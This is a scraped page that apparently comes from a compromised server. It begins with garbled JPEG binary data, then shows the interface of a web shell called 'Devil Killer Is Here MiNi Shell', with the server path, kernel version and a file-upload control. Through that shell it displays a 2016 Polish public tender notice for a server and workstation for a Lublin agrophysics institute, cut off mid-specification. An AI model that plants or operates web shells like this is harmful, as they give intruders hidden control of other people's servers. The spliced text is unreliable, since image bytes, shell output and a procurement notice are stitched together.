JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161021/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161021/328741-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='www.ipan.lublin.pl' target='_blank'>www.ipan.lublin.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 328741 - 2016
              z dnia 2016-10-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Lublin: Dostawa serwera i stacji roboczej dla Instytutu Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie
służącej potrzebom badań naukowych lub prac rozwojowych na rozbudowę infrastruktury informatycznej nauki pn. Rozbudowa zaplecza informatycznego badań naukowych i prac rozwojowych Instytutu Agrofizyki Polskiej Akademii Nauk
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br />Postępowanie przeprowadzone w trybie przetargu nieograniczonego na: Dostawę serwera i stacji roboczej dla Instytutu Agrofizyki im. B. Dobrzańskiego  Polskiej Akademii Nauk w Lublinie służącej potrzebom badań naukowych lub prac rozwojowych na rozbudowę infrastruktury informatycznej nauki pn. Rozbudowa zaplecza informatycznego badań naukowych i prac rozwojowych Instytutu Agrofizyki Polskiej Akademii Nauk</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Instytut Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie, krajowy numer identyfikacyjny
              32638000000, ul.
              ul. Doświadczalna 
              4,
              20290  
              Lublin, woj.
              lubelskie, państwo
              Polska, tel.
              081 7445061 w. 110, e-mail
              , faks
              817 445 067.
              <br />
              Adres strony internetowej (URL): www.ipan.lublin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: instytut naukowy Polskiej Akademii Nauk</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.ipan.lublin.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Instytut Agrofizyki im. Bohdana Dobrzańskiego Polskiej Akademii Nauk w Lublinie, ul. Doświadczalna 4, bud. A,  pok. 18 (sekretariat)</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa serwera i stacji roboczej dla Instytutu Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie
służącej potrzebom badań naukowych lub prac rozwojowych na rozbudowę infrastruktury informatycznej nauki pn. Rozbudowa zaplecza informatycznego badań naukowych i prac rozwojowych Instytutu Agrofizyki Polskiej Akademii Nauk
<br /><b>Numer referencyjny: </b>A-2401-30/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Dostawa serwera i stacji roboczej dla Instytutu Agrofizyki im. B. Dobrzańskiego Polskiej Akademii Nauk w Lublinie
służącej potrzebom badań naukowych lub prac rozwojowych na rozbudowę infrastruktury informatycznej nauki pn. Rozbudowa zaplecza informatycznego badań naukowych i prac rozwojowych Instytutu Agrofizyki Polskiej Akademii Nauk
Wartość zamówienia: poniżej kwot określonych na podstawie przepisów art. 11 ust 8 Pzp.
CPV:
48820000-2 Serwery
48821000-9 Serwery sieciowe
30214000-2 Stacje robocze
30211000-1 Komputery wysokowydajne
30233141-1 Nadmiarowa macierz niezależnych dysków (RAID)
30234100-9 Dysk magnetyczny
30236110-6 Pamięć o dostępie swobodnym (RAM)
Szczegółowy opis przedmiotu zamówienia stanowi Załącznik nr 2 do SIWZ  Opis przedmiotu zamówienia do SIWZ.
Rozwiązania równoważne: 
1)Ilekroć w opisie przedmiotu zamówienia zawartym w SIWZ wskazane zostały normy, znaki towarowe, patenty, pochodzenie, aprobaty lub specyfikacje techniczne należy rozumieć je tylko jako przykładowe, Zamawiający dopuszcza rozwiązania (oferty) równoważne.
2)Za ofertę równoważną Zamawiający uzna tę, która spełnia wszystkie wymagania Zamawiającego określone w opisie przedmiotu zamówienia zawartym 
w Szczegółowym opisie przedmiotu zamówienia tj. w załączniku nr 2
do SIWZ oraz Zestawieniu wymaganych parametrów użytkowych stanowiących załącznik nr 3 do SIWZ, których parametry techniczne i funkcjonalne są identyczne lub lepsze niż wskazane w ww. zał. do SIWZ.
3)Ewentualne wskazane przez Zamawiającego nazwy, producenci mają na celu określenie klasy produktu będącego opisem przedmiotu zamówienia i służą ustaleniu standardu nie wskazują natomiast na konkretny wyrób lub konkretnego producenta.
4)Wykonawca, który powoła się na rozwiązania równoważne, jest obowiązany wykazać, 
że oferowany przez niego przedmiot zamówienia spełnia wymagania określone przez Zamawiającego.
Dostawa serwera i stacji roboczej

Stacja robocza do obliczeń numerycznych, wizualizacji i przetwarzania obrazów

Lp.	Parametry minimalne / właściwości
1	Wydajność obliczeniowa:
1a	Stacja wyposażona w dwa procesory taktowane zegarem co najmniej 3,5 GHz, pamięci cache L3 min. 15 MB, min. 4 rdzenie.
2	Pamięć operacyjna: 
2a	Min. 256 GB  moduły 8x32 GB, typu ECC, registered.
UWAGA! Kryterium oceny ofert
2b	Możliwość rozbudowy do min. 1024 GB.
2c	Częstotliwość taktowania do 2400 MHz.
3	Pamięć masowa: 
3a	Dwa dyski twarde: min. 256GB SSD oraz min. 512GB SSD.
4	Grafika: 
4a	Z linii kart do zastosowań profesjonalnych.
4b	Min. 4GB RAM GDDR5. 
4c	Min. 768 rdzeni obliczeniowych.
4d	Wydajność nie mniejsza niż 4400 pkt. w teście wydajności Kart Graficznych (wynik umieszczony na stronie: http://www.videocardbenchmark.net/gpu_list.php).

5	Wirtualizacja:
5a	Sprzętowe wsparcie technologii wirtualizacji realizowane łącznie w procesorze, chipsecie płyty głównej oraz w  BIOS systemu (możliwość włączenia/wyłączenia sprzętowego wsparcia wirtualizacji dla poszczególnych komponentów systemu).
6	Wbudowana w płytę główną technologia zarządzania i monitorowania komputerem na poziomie sprzętowym: 
6a	Działająca niezależnie od stanu czy obecności systemu operacyjnego oraz stanu włączenia komputera.
6b	Obsługująca zdalną komunikację sieciową w oparciu o protokół IPv4 oraz IPv6.
6c	Monitorowanie konfiguracji komponentów komputera  CPU, Pamięć, HDD, wersja BIOS płyty głównej.
6d	Zdalną konfigurację ustawień BIOS.
6e	Zdalne przejęcie konsoli tekstowej systemu, przekierowanie procesu ładowania systemu operacyjnego z wirtualnego CD ROM lub FDD z serwera zarządzającego.
6f	Zdalne przejęcie pełnej konsoli graficznej systemu tzw. KVM Redirection (Keybord, Video, Mouse) bez udziału systemu operacyjnego ani dodatkowych programów, również w przypadku braku lub uszkodzenia systemu operacyjnego do rozdzielczości 1600x900 włącznie.
6g	Technologia zarządzania i monitorowania komputerem na poziomie sprzętowym powinna być zgodna z otwartymi standardami DMTF WS-MAN 1.0.0 (http://www.dmtf.org/standards/wsman) oraz DASH 1.0.0 (http://www.dmtf.org/standards/mgmt/dash/);

6h	Wbudowany sprzętowo log operacji  zdalnego zarządzania, możliwy do kasowania tylko przez upoważnionego użytkownika systemu sprzętowego zarządzania zdalnego.
6i	Sprzętowy firewall zarządzany i konfigurowany wyłącznie z serwera zarządzania oraz niedostępny dla lokalnego systemu OS i lokalnych aplikacji.
7	Bezpieczeństwo:
7a	Sprzętowe wsparcie technologii weryfikacji poprawności podpisu cyfrowego  wykonywanego kodu oprogramowania, oraz sprzętowa izolacja segmentów pamięci dla kodu wykonywanego w trybie zaufanym  wbudowane w procesor, kontroler pamięci, chipset I/O.
8	Wyposażenie multimedialne: 
8a	Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition,  porty słuchawek i mikrofonu na przednim oraz na tylnym panelu obudowy, obudowa wyposażona w głośnik.
9	Obudowa:
9a	Typu TOWER (przygotowana instalacji w szafie RACK z wykorzystaniem stelaża dedykowanego do stacji graficznej) z obsługą kart PCI Express wyłącznie o pełnym profilu.
9b	Dedykowany do oferowanego modelu stacji roboczej zestaw do instalacji w szafie RACK.
9c	Zasilacz o mocy minimum 1200W pracujący w sieci 230V 50/60Hz prądu zmiennego z aktywnym PFC i efektywności min. 90%.
9d	W celu szybkiej weryfikacji usterki w obudowę komputera musi być wbudowany akustyczny system diagnostyczny, służący do sygnalizowania i diagnozowania problemów z komputerem i jego komponentami;
10	Zgodność z systemami operacyjnymi i standardami: 
10a	Oferowane modele komputerów muszą posiadać certyfikat Microsoft, potwierdzający poprawną współpracę oferowanych modeli komputerów z systemem operacyjnym Windows 7  64-bit., Windows 8.1 64-bit. oraz Windows 10 64-bit. (załączyć wydruk ze strony Microsoft WHCL) oraz Windows Server 2012 i 2012R2   (załączyć wydruk ze strony Microsoft WHQL).
11	BIOS:
11a	Możliwość, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych podłączonych do niego urządzeń zewnętrznych odczytania z BIOS informacji o:
	wersji i daty publikacji BIOS,
	ilości i sposobu obłożenia slotów pamięciami RAM oraz rodzaju pamięci RAM,
	typie procesora wraz z informacją o ilości rdzeni, wątków, ,zainstalowanego dysku twardego lub dysku SSD,
	rodzajach napędów optycznych,
	MAC adresie zintegrowanej karty sieciowej.
11b	Funkcja blokowania wejścia do  BIOS oraz blokowania startu systemu operacyjnego, (gwarantujący utrzymanie zapisanego hasła nawet w przypadku odłączenia wszystkich źródeł zasilania i podtrzymania BIOS).
11c	Funkcja blokowania/odblokowania BOOT-owania stacji roboczej z zewnętrznych urządzeń.
11d	Możliwość, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego urządzeń zewnętrznych,  ustawienia hasła na poziomie systemu, administratora oraz dysku twardego oraz możliwość ustawienia następujących zależności pomiędzy nimi: brak możliwości zmiany hasła pozwalającego na uruchomienie systemu bez podania hasła administratora.
11e	Musi posiadać możliwość ustawienia zależności pomiędzy hasłem administratora a hasłem systemowym tak, aby nie było możliwe wprowadzenie zmian w BIOS wyłącznie po podaniu hasła systemowego.
11f	Możliwość włączenia/wyłączenia zintegrowanej karty dźwiękowej, karty sieciowej, modułu TPM, portu równoległego, portu szeregowego z poziomu BIOS, bez uruchamiania systemu operacyjnego z dysku twardego komputera lub innych, podłączonych do niego, urządzeń zewnętrznych.
11g	Możliwość ustawienia portów USB w trybie no BOOT, czyli podczas startu komputer nie wykrywa urządzeń bootujących typu USB, natomiast po uruchomieniu systemu operacyjnego porty USB są aktywne.
11h	Możliwość wyłączania portów USB .
12	Dodatkowe oprogramowanie:
12a	Oprogramowanie dostarczone przez producenta komputera pozwalające na zdalną inwentaryzację komputerów w sieci, lokalną i zdalną inwentaryzację komponentów komputera, umożliwiające co najmniej:
	Informowanie administratora o otwarciu obudowy,
	Zdalne wyłączanie, restart oraz hibernacje komputera w sieci,
	Otrzymywanie informacji WMI  Windows Management Interface,
	Tworzenie raportów stanu jednostki,
	Monitorowanie stanu komponentów: CPU, Pamięć RAM, HDD, wersje BIOS,
	Aktualizację BIOS do najnowszej wersji,
	Tworzenie kopii zapasowych BIOS wraz z ustawieniami,
	Tworzenie indywidualnych numerów dla poszczególnych użytkowników,
	Włączenie lub wyłączanie BOOTowania portów USB,
	Zdalne zarządzanie energią.
12b	W pełni  automatyczną instalację sterowników urządzeń opartą o automatyczną detekcję posiadanego sprzętu.
12c	Certyfikowane oprogramowanie zintegrowane w BIOS umożliwiające w bezpieczny (bezpowrotny) sposób usunięcie danych z dysku twardego.
13	Ergonomia:
13a	Głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji obserwatora w trybie jałowym (IDLE) wynosząca maksymalnie 22 dB (załączyć oświadczenie producenta wraz z raportem badawczym wystawionym przez akredytowaną jednostkę).
13b	Moduł konstrukcji obudowy w jednostce centralnej komputera powinien pozwalać na demontaż kart rozszerzeń i napędów bez konieczności użycia narzędzi (wyklucza się użycia wkrętów, śrub motylkowych).
13c	Obudowa w jednostce centralnej musi być otwierana bez konieczności użycia narzędzi (wyklucza się użycie standardowych wkrętów, śrub motylkowych) oraz powinna posiadać czujnik otwarcia obudowy współpracujący z oprogramowaniem zarządzająco  diagnostycznym producenta  komputera.
13d	Obudowa musi umożliwiać zastosowanie zabezpieczenia fizycznego w postaci linki metalowej, kłódki (oczko w obudowie do założenia kłódki).
14	Wymagania dodatkowe:
14a	Wyjścia graficzne co najmniej 3 x Display Port.
14b	Karta FC jednoportowa 8GB SWL.
14c	Wbudowane porty minimalnie:
	2 x RJ-45,
	1 x Audio: line-in,
	1 x Audio: line-out,
	1 x Audio: mikrofon z przodu obudowy,
	1 x Audio: słuchawki z przodu obudowy,
	13 szt. USB w tym: minimum 4 porty z przodu obudowy (w tym min. 2 x USB 3.0), minimum 6 portów z tyłu obudowy (w tym co najmniej 2x USB 3.0), minimum 3 porty wewnątrz obudowy.
Wymagana ilość i rozmieszczenie (na zewnątrz obudowy komputera) portów USB nie może być osiągnięta w wyniku stosowania konwerterów, przejściówek itp.
14d	Dwie karty sieciowe 10/100/1000 Ethernet RJ 45, zintegrowane z płytą główną, wspierająca obsługę WoL (funkcja włączana przez użytkownika).
14e	Zintegrowany z płytą główną dedykowany układ sprzętowy służący do tworzenia i zarządzania wygenerowanymi przez komputer kluczami szyfrowania. Zabezpieczenie to musi posiadać możliwość szyfrowania poufnych dokumentów przechowywanych na dysku twardym przy użyciu klucza sprzętowego.
14f	Płyta główna z wbudowanymi:
	min. 1x PCI-Express 3.0 x8 Full height,
	min. 3x PCI-Express 3.0 x16 Full height,
	min. 1x PCI-Express 2.0 x4 (mech. x16) Full height,
	min. 1x PCI-Express 2.0 x4 (mech. x8) Full height,
	min. 8 złączy SATA  3.0 NCQ,
	kontroler SATA musi zapewniać możliwość konfiguracji RAID 0/1/5.
15	Komputery mają spełniać normy  i posiadać deklaracje zgodności (lub inne dokumenty potwierdzające spełnienie norm):
15a	Deklaracja zgodności CE.
15b	Wymaga się dla potwierdzenia, że oferowany sprzęt  odpowiada  postawionym wymaganiom i był wykonany przez Wykonawcę  (a jeżeli Wykonawca nie jest producentem to przez producenta) w systemie zapewnienia jakości  wg normy  ISO 9001 aby Wykonawca  posiadał Certyfikat ISO 9001  lub inne zaświadczenie/dokument  wydane przez niezależny podmiot zajmujący się  poświadczaniem zgodności działań wykonawcy z normami jakościowymi  -odpowiadającej normie  ISO 9001- (załączyć dokument potwierdzający spełnianie wymogu). 
15c	Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych w postaci oświadczenia wykonawcy wystawionego na podstawie dokumentacji producenta jednostki (wg. wytycznych Krajowej Agencji Poszanowania Energii S.A., zawartych w dokumencie Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych, pkt. 3.4.2.1; dokument z grudnia 2006), w szczególności zgodności z normą ISO 1043-4 dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram.
16	Gwarancja:
16a	Na okres co najmniej 36 miesięcy (UWAGA! Kryterium oceny ofert) - świadczonej  w siedzibie Zamawiającego, chyba że niezbędne będzie naprawa sprzętu w siedzibie producenta ,lub autoryzowanym przez niego punkcie serwisowym  - wówczas koszt transportu do i z naprawy pokrywa Wykonawca.
16b	Naprawy gwarancyjne  urządzeń musi być realizowany przez Producenta lub Autoryzowanego Partnera Serwisowego Producenta.
17	Wsparcie techniczne producenta:
17a	Możliwość telefonicznego sprawdzenia konfiguracji sprzętowej komputera oraz warunków gwarancji po podaniu numeru seryjnego bezpośrednio u producenta lub jego przedstawiciela.
17b	Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera  do oferty należy dołączyć link strony.
18	Oprogramowanie do zdalnego dostępu w trybie graficznym:
18a	Pełne wsparcie aplikacji graficznych wymagających sprzętowego renderingu.
18b	Oprogramowanie serwera dostępne na systemy operacyjne: Windows (7, 8.1, 10) oraz Linux (RHEL v6, 7, SLED 12).
18c	Oprogramowanie klienta dostępne na systemy operacyjne: Windows (7, 8.1, 10), Linux (RHEL v6, 7, SLED 12) oraz MacOS 10.
18d	Możliwość współdzielenia zdalnego pulpitu z wieloma klientami.
18e	Wykorzystanie lokalnych kont systemowych do uwierzytelniania.
18f	Wykorzystanie kart SMART do uwierzytelniania.
18g	Możliwość szyfrowamia komunkacji kliet-serwer.
18h	Współdzielenie schowka systemowego pomiędzy lokalnym i zdalnym systemem operacyjnym.


Serwer wirtualizacyjny
1	Obudowa:
1a	Typu RACK, wysokość 2U.
1b	Dostarczona wraz z szynami umożliwiającymi pełne wysunięcie serwera z szafy RACK.
1c	Dwuprocesorowa, wyprodukowana i zaprojektowana przez producenta serwera, możliwość instalacji procesorów dwunastordzeniowych.
2	Płyta główna:
2a	Minimum 6 złącz PCI Express generacji 3 low profile, w tym minimum 3 złącza o prędkości x16 i 3 złącza o prędkości x8.
2b	Możliwość integracji dedykowanej, wewnętrznej pamięci flash przeznaczonej dla wirtualizatora (niezależne od dysków twardych).
2c	Zainstalowane dwa procesory 10-rdzeniowe w architekturze x86_64 osiągające w oferowanym serwerze w testach wydajności SPECint_rate2006 min. 850 pkt.
2d	Wymagane dołączenie do oferty pełnego protokołu testów SPEC dla oferowanego modelu serwera wyposażonego w oferowane procesory, protokół poświadczony przez producenta serwera.
3	Pamięć RAM:
3a	Zainstalowane min. 64 GB pamięci RAM (UWAGA! Kryterium oceny ofert) typu DDR4 Registered, 2400 Mhz w kościach o pojemności 8GB.
3b	Wsparcie dla technologii zabezpieczania pamięci Advanced ECC, Memory Scrubbing, SDDC.
3c	Wsparcie dla konfiguracji pamięci w trybie Rank Sparing.
3d	24 gniazda pamięci RAM na płycie głównej, obsługa minimum 1500GB pamięci RAM DDR4.
4	Kontrolery dyskowe, I/O:
4a	Zainstalowany kontroler SAS 12G RAID 0,1,5,6,50,60.
4b	Min. 1GB pamięci podręcznej cache.
4c	Wyposażony w nieulotną pamięć cache.
5	Dyski twarde:
5a	Zainstalowane 3 dyski SAS 12G 10K RPM o pojemności min. 600 GB każdy, dyski Hotplug.
5b	Minimum 8 wnęk dla dysków twardych Hotplug 2,5 cala.
5c	Możliwość rozbudowy serwera do obsługi minimum 16 dysków twardych Hotplug 2,5 cala.
6	Kontrolery LAN:
6a	Trwale zintegrowana karta LAN, nie zajmująca żadnego z dostępnych slotów PCI Express, wyposażona minimum w interfejsy: 4x1Gb/s LAN.
6b	Wsparcie iSCSI i iSCSI boot i teamingu.
6c	Interfejsy kontrolera LAN RJ-45.
6d	Karta LAN musi umożliwiać wymianę interfejsów na interfejsy 2x10Gbit SFP+ bez potrzeby wymiany całego układu lub instalacji dodatkowych kart w slotach PCI Exspress.
7	Kontrolery I/O:
7a	Karta FC 8G 2-portowa.
8	Porty:
8a	Zintegrowana karta graficzna ze złączem VGA.
8b	6x USB, w tym minimum 3x USB w standardzie 3.0 (1 wewnętrzne, 2 dostępne z tyłu serwera); Ilość dostępnych złącz USB nie może być osiągnięta poprzez stosowanie zewnętrznych przejściówek, rozgałęziaczy czy dodatkowych kart rozszerzeń zajmujących jakikolwiek slot PCI Express serwera.
9	Zasilanie, chłodzenie:
